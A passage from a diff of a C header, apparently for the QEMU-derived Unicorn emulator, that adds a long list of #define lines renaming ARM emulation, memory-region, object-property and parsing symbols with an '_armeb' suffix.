helper_neon_qrshl_u16_armeb +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_armeb +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_armeb +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_armeb +#define helper_neon_qshl_s16 helper_neon_qshl_s16_armeb +#define helper_neon_qshl_s32 helper_neon_qshl_s32_armeb +#define helper_neon_qshl_s64 helper_neon_qshl_s64_armeb +#define helper_neon_qshl_s8 helper_neon_qshl_s8_armeb +#define helper_neon_qshl_u16 helper_neon_qshl_u16_armeb +#define helper_neon_qshl_u32 helper_neon_qshl_u32_armeb +#define helper_neon_qshl_u64 helper_neon_qshl_u64_armeb +#define helper_neon_qshl_u8 helper_neon_qshl_u8_armeb +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_armeb +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_armeb +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_armeb +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_armeb +#define helper_neon_qsub_s16 helper_neon_qsub_s16_armeb +#define helper_neon_qsub_s32 helper_neon_qsub_s32_armeb +#define helper_neon_qsub_s64 helper_neon_qsub_s64_armeb +#define helper_neon_qsub_s8 helper_neon_qsub_s8_armeb +#define helper_neon_qsub_u16 helper_neon_qsub_u16_armeb +#define helper_neon_qsub_u32 helper_neon_qsub_u32_armeb +#define helper_neon_qsub_u64 helper_neon_qsub_u64_armeb +#define helper_neon_qsub_u8 helper_neon_qsub_u8_armeb +#define helper_neon_qunzip16 helper_neon_qunzip16_armeb +#define helper_neon_qunzip32 helper_neon_qunzip32_armeb +#define helper_neon_qunzip8 helper_neon_qunzip8_armeb +#define helper_neon_qzip16 helper_neon_qzip16_armeb +#define helper_neon_qzip32 helper_neon_qzip32_armeb +#define helper_neon_qzip8 helper_neon_qzip8_armeb +#define helper_neon_rbit_u8 helper_neon_rbit_u8_armeb +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_armeb +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_armeb +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_armeb +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_armeb +#define helper_neon_rhadd_u32 
helper_neon_rhadd_u32_armeb +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_armeb +#define helper_neon_rshl_s16 helper_neon_rshl_s16_armeb +#define helper_neon_rshl_s32 helper_neon_rshl_s32_armeb +#define helper_neon_rshl_s64 helper_neon_rshl_s64_armeb +#define helper_neon_rshl_s8 helper_neon_rshl_s8_armeb +#define helper_neon_rshl_u16 helper_neon_rshl_u16_armeb +#define helper_neon_rshl_u32 helper_neon_rshl_u32_armeb +#define helper_neon_rshl_u64 helper_neon_rshl_u64_armeb +#define helper_neon_rshl_u8 helper_neon_rshl_u8_armeb +#define helper_neon_shl_s16 helper_neon_shl_s16_armeb +#define helper_neon_shl_s32 helper_neon_shl_s32_armeb +#define helper_neon_shl_s64 helper_neon_shl_s64_armeb +#define helper_neon_shl_s8 helper_neon_shl_s8_armeb +#define helper_neon_shl_u16 helper_neon_shl_u16_armeb +#define helper_neon_shl_u32 helper_neon_shl_u32_armeb +#define helper_neon_shl_u64 helper_neon_shl_u64_armeb +#define helper_neon_shl_u8 helper_neon_shl_u8_armeb +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_armeb +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_armeb +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_armeb +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_armeb +#define helper_neon_subl_u16 helper_neon_subl_u16_armeb +#define helper_neon_subl_u32 helper_neon_subl_u32_armeb +#define helper_neon_sub_u16 helper_neon_sub_u16_armeb +#define helper_neon_sub_u8 helper_neon_sub_u8_armeb +#define helper_neon_tbl helper_neon_tbl_armeb +#define helper_neon_tst_u16 helper_neon_tst_u16_armeb +#define helper_neon_tst_u32 helper_neon_tst_u32_armeb +#define helper_neon_tst_u8 helper_neon_tst_u8_armeb +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_armeb +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_armeb +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_armeb +#define helper_neon_unzip16 helper_neon_unzip16_armeb +#define helper_neon_unzip8 helper_neon_unzip8_armeb +#define helper_neon_uqadd_s16 
helper_neon_uqadd_s16_armeb +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_armeb +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_armeb +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_armeb +#define helper_neon_widen_s16 helper_neon_widen_s16_armeb +#define helper_neon_widen_s8 helper_neon_widen_s8_armeb +#define helper_neon_widen_u16 helper_neon_widen_u16_armeb +#define helper_neon_widen_u8 helper_neon_widen_u8_armeb +#define helper_neon_zip16 helper_neon_zip16_armeb +#define helper_neon_zip8 helper_neon_zip8_armeb +#define helper_pre_hvc helper_pre_hvc_armeb +#define helper_pre_smc helper_pre_smc_armeb +#define helper_qadd16 helper_qadd16_armeb +#define helper_qadd8 helper_qadd8_armeb +#define helper_qaddsubx helper_qaddsubx_armeb +#define helper_qsub16 helper_qsub16_armeb +#define helper_qsub8 helper_qsub8_armeb +#define helper_qsubaddx helper_qsubaddx_armeb +#define helper_rbit helper_rbit_armeb +#define helper_recpe_f32 helper_recpe_f32_armeb +#define helper_recpe_f64 helper_recpe_f64_armeb +#define helper_recpe_u32 helper_recpe_u32_armeb +#define helper_recps_f32 helper_recps_f32_armeb +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_armeb +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_armeb +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_armeb +#define helper_ret_stb_mmu helper_ret_stb_mmu_armeb +#define helper_rintd helper_rintd_armeb +#define helper_rintd_exact helper_rintd_exact_armeb +#define helper_rints helper_rints_armeb +#define helper_rints_exact helper_rints_exact_armeb +#define helper_ror_cc helper_ror_cc_armeb +#define helper_rsqrte_f32 helper_rsqrte_f32_armeb +#define helper_rsqrte_f64 helper_rsqrte_f64_armeb +#define helper_rsqrte_u32 helper_rsqrte_u32_armeb +#define helper_rsqrts_f32 helper_rsqrts_f32_armeb +#define helper_sadd16 helper_sadd16_armeb +#define helper_sadd8 helper_sadd8_armeb +#define helper_saddsubx helper_saddsubx_armeb +#define helper_sar_cc helper_sar_cc_armeb +#define helper_sdiv helper_sdiv_armeb +#define 
helper_sel_flags helper_sel_flags_armeb +#define helper_set_cp_reg helper_set_cp_reg_armeb +#define helper_set_cp_reg64 helper_set_cp_reg64_armeb +#define helper_set_neon_rmode helper_set_neon_rmode_armeb +#define helper_set_r13_banked helper_set_r13_banked_armeb +#define helper_set_rmode helper_set_rmode_armeb +#define helper_set_user_reg helper_set_user_reg_armeb +#define helper_shadd16 helper_shadd16_armeb +#define helper_shadd8 helper_shadd8_armeb +#define helper_shaddsubx helper_shaddsubx_armeb +#define helper_shl_cc helper_shl_cc_armeb +#define helper_shr_cc helper_shr_cc_armeb +#define helper_shsub16 helper_shsub16_armeb +#define helper_shsub8 helper_shsub8_armeb +#define helper_shsubaddx helper_shsubaddx_armeb +#define helper_ssat helper_ssat_armeb +#define helper_ssat16 helper_ssat16_armeb +#define helper_ssub16 helper_ssub16_armeb +#define helper_ssub8 helper_ssub8_armeb +#define helper_ssubaddx helper_ssubaddx_armeb +#define helper_stb_mmu helper_stb_mmu_armeb +#define helper_stl_mmu helper_stl_mmu_armeb +#define helper_stq_mmu helper_stq_mmu_armeb +#define helper_stw_mmu helper_stw_mmu_armeb +#define helper_sub_saturate helper_sub_saturate_armeb +#define helper_sub_usaturate helper_sub_usaturate_armeb +#define helper_sxtb16 helper_sxtb16_armeb +#define helper_uadd16 helper_uadd16_armeb +#define helper_uadd8 helper_uadd8_armeb +#define helper_uaddsubx helper_uaddsubx_armeb +#define helper_udiv helper_udiv_armeb +#define helper_uhadd16 helper_uhadd16_armeb +#define helper_uhadd8 helper_uhadd8_armeb +#define helper_uhaddsubx helper_uhaddsubx_armeb +#define helper_uhsub16 helper_uhsub16_armeb +#define helper_uhsub8 helper_uhsub8_armeb +#define helper_uhsubaddx helper_uhsubaddx_armeb +#define helper_uqadd16 helper_uqadd16_armeb +#define helper_uqadd8 helper_uqadd8_armeb +#define helper_uqaddsubx helper_uqaddsubx_armeb +#define helper_uqsub16 helper_uqsub16_armeb +#define helper_uqsub8 helper_uqsub8_armeb +#define helper_uqsubaddx helper_uqsubaddx_armeb 
+#define helper_usad8 helper_usad8_armeb +#define helper_usat helper_usat_armeb +#define helper_usat16 helper_usat16_armeb +#define helper_usub16 helper_usub16_armeb +#define helper_usub8 helper_usub8_armeb +#define helper_usubaddx helper_usubaddx_armeb +#define helper_uxtb16 helper_uxtb16_armeb +#define helper_v7m_mrs helper_v7m_mrs_armeb +#define helper_v7m_msr helper_v7m_msr_armeb +#define helper_vfp_absd helper_vfp_absd_armeb +#define helper_vfp_abss helper_vfp_abss_armeb +#define helper_vfp_addd helper_vfp_addd_armeb +#define helper_vfp_adds helper_vfp_adds_armeb +#define helper_vfp_cmpd helper_vfp_cmpd_armeb +#define helper_vfp_cmped helper_vfp_cmped_armeb +#define helper_vfp_cmpes helper_vfp_cmpes_armeb +#define helper_vfp_cmps helper_vfp_cmps_armeb +#define helper_vfp_divd helper_vfp_divd_armeb +#define helper_vfp_divs helper_vfp_divs_armeb +#define helper_vfp_fcvtds helper_vfp_fcvtds_armeb +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_armeb +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_armeb +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_armeb +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_armeb +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_armeb +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_armeb +#define helper_vfp_maxd helper_vfp_maxd_armeb +#define helper_vfp_maxnumd helper_vfp_maxnumd_armeb +#define helper_vfp_maxnums helper_vfp_maxnums_armeb +#define helper_vfp_maxs helper_vfp_maxs_armeb +#define helper_vfp_mind helper_vfp_mind_armeb +#define helper_vfp_minnumd helper_vfp_minnumd_armeb +#define helper_vfp_minnums helper_vfp_minnums_armeb +#define helper_vfp_mins helper_vfp_mins_armeb +#define helper_vfp_muladdd helper_vfp_muladdd_armeb +#define helper_vfp_muladds helper_vfp_muladds_armeb +#define helper_vfp_muld helper_vfp_muld_armeb +#define helper_vfp_muls helper_vfp_muls_armeb +#define helper_vfp_negd helper_vfp_negd_armeb +#define helper_vfp_negs helper_vfp_negs_armeb +#define 
helper_vfp_set_fpscr helper_vfp_set_fpscr_armeb +#define helper_vfp_shtod helper_vfp_shtod_armeb +#define helper_vfp_shtos helper_vfp_shtos_armeb +#define helper_vfp_sitod helper_vfp_sitod_armeb +#define helper_vfp_sitos helper_vfp_sitos_armeb +#define helper_vfp_sltod helper_vfp_sltod_armeb +#define helper_vfp_sltos helper_vfp_sltos_armeb +#define helper_vfp_sqrtd helper_vfp_sqrtd_armeb +#define helper_vfp_sqrts helper_vfp_sqrts_armeb +#define helper_vfp_sqtod helper_vfp_sqtod_armeb +#define helper_vfp_sqtos helper_vfp_sqtos_armeb +#define helper_vfp_subd helper_vfp_subd_armeb +#define helper_vfp_subs helper_vfp_subs_armeb +#define helper_vfp_toshd helper_vfp_toshd_armeb +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_armeb +#define helper_vfp_toshs helper_vfp_toshs_armeb +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_armeb +#define helper_vfp_tosid helper_vfp_tosid_armeb +#define helper_vfp_tosis helper_vfp_tosis_armeb +#define helper_vfp_tosizd helper_vfp_tosizd_armeb +#define helper_vfp_tosizs helper_vfp_tosizs_armeb +#define helper_vfp_tosld helper_vfp_tosld_armeb +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_armeb +#define helper_vfp_tosls helper_vfp_tosls_armeb +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_armeb +#define helper_vfp_tosqd helper_vfp_tosqd_armeb +#define helper_vfp_tosqs helper_vfp_tosqs_armeb +#define helper_vfp_touhd helper_vfp_touhd_armeb +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_armeb +#define helper_vfp_touhs helper_vfp_touhs_armeb +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_armeb +#define helper_vfp_touid helper_vfp_touid_armeb +#define helper_vfp_touis helper_vfp_touis_armeb +#define helper_vfp_touizd helper_vfp_touizd_armeb +#define helper_vfp_touizs helper_vfp_touizs_armeb +#define helper_vfp_tould helper_vfp_tould_armeb +#define helper_vfp_tould_round_to_zero 
helper_vfp_tould_round_to_zero_armeb +#define helper_vfp_touls helper_vfp_touls_armeb +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_armeb +#define helper_vfp_touqd helper_vfp_touqd_armeb +#define helper_vfp_touqs helper_vfp_touqs_armeb +#define helper_vfp_uhtod helper_vfp_uhtod_armeb +#define helper_vfp_uhtos helper_vfp_uhtos_armeb +#define helper_vfp_uitod helper_vfp_uitod_armeb +#define helper_vfp_uitos helper_vfp_uitos_armeb +#define helper_vfp_ultod helper_vfp_ultod_armeb +#define helper_vfp_ultos helper_vfp_ultos_armeb +#define helper_vfp_uqtod helper_vfp_uqtod_armeb +#define helper_vfp_uqtos helper_vfp_uqtos_armeb +#define helper_wfe helper_wfe_armeb +#define helper_wfi helper_wfi_armeb +#define hex2decimal hex2decimal_armeb +#define hw_breakpoint_update hw_breakpoint_update_armeb +#define hw_breakpoint_update_all hw_breakpoint_update_all_armeb +#define hw_watchpoint_update hw_watchpoint_update_armeb +#define hw_watchpoint_update_all hw_watchpoint_update_all_armeb +#define _init _init_armeb +#define init_cpreg_list init_cpreg_list_armeb +#define init_lists init_lists_armeb +#define input_type_enum input_type_enum_armeb +#define int128_2_64 int128_2_64_armeb +#define int128_add int128_add_armeb +#define int128_addto int128_addto_armeb +#define int128_and int128_and_armeb +#define int128_eq int128_eq_armeb +#define int128_ge int128_ge_armeb +#define int128_get64 int128_get64_armeb +#define int128_gt int128_gt_armeb +#define int128_le int128_le_armeb +#define int128_lt int128_lt_armeb +#define int128_make64 int128_make64_armeb +#define int128_max int128_max_armeb +#define int128_min int128_min_armeb +#define int128_ne int128_ne_armeb +#define int128_neg int128_neg_armeb +#define int128_nz int128_nz_armeb +#define int128_rshift int128_rshift_armeb +#define int128_sub int128_sub_armeb +#define int128_subfrom int128_subfrom_armeb +#define int128_zero int128_zero_armeb +#define int16_to_float32 int16_to_float32_armeb +#define 
int16_to_float64 int16_to_float64_armeb +#define int32_to_float128 int32_to_float128_armeb +#define int32_to_float32 int32_to_float32_armeb +#define int32_to_float64 int32_to_float64_armeb +#define int32_to_floatx80 int32_to_floatx80_armeb +#define int64_to_float128 int64_to_float128_armeb +#define int64_to_float32 int64_to_float32_armeb +#define int64_to_float64 int64_to_float64_armeb +#define int64_to_floatx80 int64_to_floatx80_armeb +#define invalidate_and_set_dirty invalidate_and_set_dirty_armeb +#define invalidate_page_bitmap invalidate_page_bitmap_armeb +#define io_mem_read io_mem_read_armeb +#define io_mem_write io_mem_write_armeb +#define io_readb io_readb_armeb +#define io_readl io_readl_armeb +#define io_readq io_readq_armeb +#define io_readw io_readw_armeb +#define iotlb_to_region iotlb_to_region_armeb +#define io_writeb io_writeb_armeb +#define io_writel io_writel_armeb +#define io_writeq io_writeq_armeb +#define io_writew io_writew_armeb +#define is_a64 is_a64_armeb +#define is_help_option is_help_option_armeb +#define isr_read isr_read_armeb +#define is_valid_option_list is_valid_option_list_armeb +#define iwmmxt_load_creg iwmmxt_load_creg_armeb +#define iwmmxt_load_reg iwmmxt_load_reg_armeb +#define iwmmxt_store_creg iwmmxt_store_creg_armeb +#define iwmmxt_store_reg iwmmxt_store_reg_armeb +#define __jit_debug_descriptor __jit_debug_descriptor_armeb +#define __jit_debug_register_code __jit_debug_register_code_armeb +#define kvm_to_cpreg_id kvm_to_cpreg_id_armeb +#define last_ram_offset last_ram_offset_armeb +#define ldl_be_p ldl_be_p_armeb +#define ldl_be_phys ldl_be_phys_armeb +#define ldl_he_p ldl_he_p_armeb +#define ldl_le_p ldl_le_p_armeb +#define ldl_le_phys ldl_le_phys_armeb +#define ldl_phys ldl_phys_armeb +#define ldl_phys_internal ldl_phys_internal_armeb +#define ldq_be_p ldq_be_p_armeb +#define ldq_be_phys ldq_be_phys_armeb +#define ldq_he_p ldq_he_p_armeb +#define ldq_le_p ldq_le_p_armeb +#define ldq_le_phys ldq_le_phys_armeb +#define 
ldq_phys ldq_phys_armeb +#define ldq_phys_internal ldq_phys_internal_armeb +#define ldst_name ldst_name_armeb +#define ldub_p ldub_p_armeb +#define ldub_phys ldub_phys_armeb +#define lduw_be_p lduw_be_p_armeb +#define lduw_be_phys lduw_be_phys_armeb +#define lduw_he_p lduw_he_p_armeb +#define lduw_le_p lduw_le_p_armeb +#define lduw_le_phys lduw_le_phys_armeb +#define lduw_phys lduw_phys_armeb +#define lduw_phys_internal lduw_phys_internal_armeb +#define le128 le128_armeb +#define linked_bp_matches linked_bp_matches_armeb +#define listener_add_address_space listener_add_address_space_armeb +#define load_cpu_offset load_cpu_offset_armeb +#define load_reg load_reg_armeb +#define load_reg_var load_reg_var_armeb +#define log_cpu_state log_cpu_state_armeb +#define lpae_cp_reginfo lpae_cp_reginfo_armeb +#define lt128 lt128_armeb +#define machine_class_init machine_class_init_armeb +#define machine_finalize machine_finalize_armeb +#define machine_info machine_info_armeb +#define machine_initfn machine_initfn_armeb +#define machine_register_types machine_register_types_armeb +#define machvirt_init machvirt_init_armeb +#define machvirt_machine_init machvirt_machine_init_armeb +#define maj maj_armeb +#define mapping_conflict mapping_conflict_armeb +#define mapping_contiguous mapping_contiguous_armeb +#define mapping_have_same_region mapping_have_same_region_armeb +#define mapping_merge mapping_merge_armeb +#define mem_add mem_add_armeb +#define mem_begin mem_begin_armeb +#define mem_commit mem_commit_armeb +#define memory_access_is_direct memory_access_is_direct_armeb +#define memory_access_size memory_access_size_armeb +#define memory_init memory_init_armeb +#define memory_listener_match memory_listener_match_armeb +#define memory_listener_register memory_listener_register_armeb +#define memory_listener_unregister memory_listener_unregister_armeb +#define memory_map_init memory_map_init_armeb +#define memory_mapping_filter memory_mapping_filter_armeb +#define 
memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_armeb +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_armeb +#define memory_mapping_list_free memory_mapping_list_free_armeb +#define memory_mapping_list_init memory_mapping_list_init_armeb +#define memory_region_access_valid memory_region_access_valid_armeb +#define memory_region_add_subregion memory_region_add_subregion_armeb +#define memory_region_add_subregion_common memory_region_add_subregion_common_armeb +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_armeb +#define memory_region_big_endian memory_region_big_endian_armeb +#define memory_region_clear_pending memory_region_clear_pending_armeb +#define memory_region_del_subregion memory_region_del_subregion_armeb +#define memory_region_destructor_alias memory_region_destructor_alias_armeb +#define memory_region_destructor_none memory_region_destructor_none_armeb +#define memory_region_destructor_ram memory_region_destructor_ram_armeb +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_armeb +#define memory_region_dispatch_read memory_region_dispatch_read_armeb +#define memory_region_dispatch_read1 memory_region_dispatch_read1_armeb +#define memory_region_dispatch_write memory_region_dispatch_write_armeb +#define memory_region_escape_name memory_region_escape_name_armeb +#define memory_region_finalize memory_region_finalize_armeb +#define memory_region_find memory_region_find_armeb +#define memory_region_get_addr memory_region_get_addr_armeb +#define memory_region_get_alignment memory_region_get_alignment_armeb +#define memory_region_get_container memory_region_get_container_armeb +#define memory_region_get_fd memory_region_get_fd_armeb +#define memory_region_get_may_overlap memory_region_get_may_overlap_armeb +#define memory_region_get_priority memory_region_get_priority_armeb +#define memory_region_get_ram_addr 
memory_region_get_ram_addr_armeb +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_armeb +#define memory_region_get_size memory_region_get_size_armeb +#define memory_region_info memory_region_info_armeb +#define memory_region_init memory_region_init_armeb +#define memory_region_init_alias memory_region_init_alias_armeb +#define memory_region_initfn memory_region_initfn_armeb +#define memory_region_init_io memory_region_init_io_armeb +#define memory_region_init_ram memory_region_init_ram_armeb +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_armeb +#define memory_region_init_reservation memory_region_init_reservation_armeb +#define memory_region_is_iommu memory_region_is_iommu_armeb +#define memory_region_is_logging memory_region_is_logging_armeb +#define memory_region_is_mapped memory_region_is_mapped_armeb +#define memory_region_is_ram memory_region_is_ram_armeb +#define memory_region_is_rom memory_region_is_rom_armeb +#define memory_region_is_romd memory_region_is_romd_armeb +#define memory_region_is_skip_dump memory_region_is_skip_dump_armeb +#define memory_region_is_unassigned memory_region_is_unassigned_armeb +#define memory_region_name memory_region_name_armeb +#define memory_region_need_escape memory_region_need_escape_armeb +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_armeb +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_armeb +#define memory_region_present memory_region_present_armeb +#define memory_region_read_accessor memory_region_read_accessor_armeb +#define memory_region_readd_subregion memory_region_readd_subregion_armeb +#define memory_region_ref memory_region_ref_armeb +#define memory_region_resolve_container memory_region_resolve_container_armeb +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_armeb +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_armeb +#define memory_region_set_address 
memory_region_set_address_armeb +#define memory_region_set_alias_offset memory_region_set_alias_offset_armeb +#define memory_region_set_enabled memory_region_set_enabled_armeb +#define memory_region_set_readonly memory_region_set_readonly_armeb +#define memory_region_set_skip_dump memory_region_set_skip_dump_armeb +#define memory_region_size memory_region_size_armeb +#define memory_region_to_address_space memory_region_to_address_space_armeb +#define memory_region_transaction_begin memory_region_transaction_begin_armeb +#define memory_region_transaction_commit memory_region_transaction_commit_armeb +#define memory_region_unref memory_region_unref_armeb +#define memory_region_update_container_subregions memory_region_update_container_subregions_armeb +#define memory_region_write_accessor memory_region_write_accessor_armeb +#define memory_region_wrong_endianness memory_region_wrong_endianness_armeb +#define memory_try_enable_merging memory_try_enable_merging_armeb +#define module_call_init module_call_init_armeb +#define module_load module_load_armeb +#define mpidr_cp_reginfo mpidr_cp_reginfo_armeb +#define mpidr_read mpidr_read_armeb +#define msr_mask msr_mask_armeb +#define mul128By64To192 mul128By64To192_armeb +#define mul128To256 mul128To256_armeb +#define mul64To128 mul64To128_armeb +#define muldiv64 muldiv64_armeb +#define neon_2rm_is_float_op neon_2rm_is_float_op_armeb +#define neon_2rm_sizes neon_2rm_sizes_armeb +#define neon_3r_sizes neon_3r_sizes_armeb +#define neon_get_scalar neon_get_scalar_armeb +#define neon_load_reg neon_load_reg_armeb +#define neon_load_reg64 neon_load_reg64_armeb +#define neon_load_scratch neon_load_scratch_armeb +#define neon_ls_element_type neon_ls_element_type_armeb +#define neon_reg_offset neon_reg_offset_armeb +#define neon_store_reg neon_store_reg_armeb +#define neon_store_reg64 neon_store_reg64_armeb +#define neon_store_scratch neon_store_scratch_armeb +#define new_ldst_label new_ldst_label_armeb +#define next_list 
next_list_armeb +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_armeb +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_armeb +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_armeb +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_armeb +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_armeb +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_armeb +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_armeb +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_armeb +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_armeb +#define not_v6_cp_reginfo not_v6_cp_reginfo_armeb +#define not_v7_cp_reginfo not_v7_cp_reginfo_armeb +#define not_v8_cp_reginfo not_v8_cp_reginfo_armeb +#define object_child_foreach object_child_foreach_armeb +#define object_class_foreach object_class_foreach_armeb +#define object_class_foreach_tramp object_class_foreach_tramp_armeb +#define object_class_get_list object_class_get_list_armeb +#define object_class_get_list_tramp object_class_get_list_tramp_armeb +#define object_class_get_parent object_class_get_parent_armeb +#define object_deinit object_deinit_armeb +#define object_dynamic_cast object_dynamic_cast_armeb +#define object_finalize object_finalize_armeb +#define object_finalize_child_property object_finalize_child_property_armeb +#define object_get_child_property object_get_child_property_armeb +#define object_get_link_property object_get_link_property_armeb +#define object_get_root object_get_root_armeb +#define object_initialize_with_type object_initialize_with_type_armeb +#define object_init_with_type object_init_with_type_armeb +#define object_instance_init object_instance_init_armeb +#define object_new_with_type object_new_with_type_armeb +#define object_post_init_with_type object_post_init_with_type_armeb +#define object_property_add_alias object_property_add_alias_armeb +#define object_property_add_link 
object_property_add_link_armeb +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_armeb +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_armeb +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_armeb +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_armeb +#define object_property_allow_set_link object_property_allow_set_link_armeb +#define object_property_del object_property_del_armeb +#define object_property_del_all object_property_del_all_armeb +#define object_property_find object_property_find_armeb +#define object_property_get object_property_get_armeb +#define object_property_get_bool object_property_get_bool_armeb +#define object_property_get_int object_property_get_int_armeb +#define object_property_get_link object_property_get_link_armeb +#define object_property_get_qobject object_property_get_qobject_armeb +#define object_property_get_str object_property_get_str_armeb +#define object_property_get_type object_property_get_type_armeb +#define object_property_is_child object_property_is_child_armeb +#define object_property_set object_property_set_armeb +#define object_property_set_description object_property_set_description_armeb +#define object_property_set_link object_property_set_link_armeb +#define object_property_set_qobject object_property_set_qobject_armeb +#define object_release_link_property object_release_link_property_armeb +#define object_resolve_abs_path object_resolve_abs_path_armeb +#define object_resolve_child_property object_resolve_child_property_armeb +#define object_resolve_link object_resolve_link_armeb +#define object_resolve_link_property object_resolve_link_property_armeb +#define object_resolve_partial_path object_resolve_partial_path_armeb +#define object_resolve_path object_resolve_path_armeb +#define object_resolve_path_component object_resolve_path_component_armeb +#define object_resolve_path_type object_resolve_path_type_armeb +#define 
object_set_link_property object_set_link_property_armeb +#define object_unparent object_unparent_armeb +#define omap_cachemaint_write omap_cachemaint_write_armeb +#define omap_cp_reginfo omap_cp_reginfo_armeb +#define omap_threadid_write omap_threadid_write_armeb +#define omap_ticonfig_write omap_ticonfig_write_armeb +#define omap_wfi_write omap_wfi_write_armeb +#define op_bits op_bits_armeb +#define open_modeflags open_modeflags_armeb +#define op_to_mov op_to_mov_armeb +#define op_to_movi op_to_movi_armeb +#define output_type_enum output_type_enum_armeb +#define packFloat128 packFloat128_armeb +#define packFloat16 packFloat16_armeb +#define packFloat32 packFloat32_armeb +#define packFloat64 packFloat64_armeb +#define packFloatx80 packFloatx80_armeb +#define page_find page_find_armeb +#define page_find_alloc page_find_alloc_armeb +#define page_flush_tb page_flush_tb_armeb +#define page_flush_tb_1 page_flush_tb_1_armeb +#define page_init page_init_armeb +#define page_size_init page_size_init_armeb +#define par par_armeb +#define parse_array parse_array_armeb +#define parse_error parse_error_armeb +#define parse_escape parse_escape_armeb +#define parse_keyword parse_keyword_armeb +#define parse_literal parse_literal_armeb +#define parse_object parse_object_armeb +#define parse_optional parse_optional_armeb +#define parse_option_bool parse_option_bool_armeb +#define parse_option_number parse_option_number_armeb +#define parse_option_size parse_option_size_armeb +#define parse_pair parse_pair_armeb +#define parser_context_free parser_context_free_armeb +#define parser_context_new parser_context_new_armeb +#define parser_context_peek_token parser_context_peek_token_armeb +#define parser_context_pop_token parser_context_pop_token_armeb +#define parser_context_restore parser_context_restore_armeb +#define parser_context_save parser_context_save_armeb +#define parse_str parse_str_armeb +#define parse_type_bool parse_type_bool_armeb +#define parse_type_int 
parse_type_int_armeb +#define parse_type_number parse_type_number_armeb +#define parse_type_size parse_type_size_armeb +#define parse_type_str parse_type_str_armeb +#define parse_value parse_value_armeb +#define par_write par_write_armeb +#define patch_reloc patch_reloc_armeb +#define phys_map_node_alloc phys_map_node_alloc_armeb +#define phys_map_node_reserve phys_map_node_reserve_armeb +#define phys_mem_alloc phys_mem_alloc_armeb +#define phys_mem_set_alloc phys_mem_set_alloc_armeb +#define phys_page_compact phys_page_compact_armeb +#define phys_page_compact_all phys_page_compact_all_armeb +#define phys_page_find phys_page_find_armeb +#define phys_page_set phys_page_set_armeb +#define phys_page_set_level phys_page_set_level_armeb +#define phys_section_add phys_section_add_armeb +#define phys_section_destroy phys_section_destroy_armeb +#define phys_sections_free phys_sections_free_armeb +#define pickNaN pickNaN_armeb +#define pickNaNMulAdd pickNaNMulAdd_armeb +#define pmccfiltr_write pmccfiltr_write_armeb +#define pmccntr_read pmccntr_read_armeb +#define pmccntr_sync pmccntr_sync_armeb +#define pmccntr_write pmccntr_write_armeb +#define pmccntr_write32 pmccntr_write32_armeb +#define pmcntenclr_write pmcntenclr_write_armeb +#define pmcntenset_write pmcntenset_write_armeb +#define pmcr_write pmcr_write_armeb +#define pmintenclr_write pmintenclr_write_armeb +#define pmintenset_write pmintenset_write_armeb +#define pmovsr_write pmovsr_write_armeb +#define pmreg_access pmreg_access_armeb +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_armeb +#define 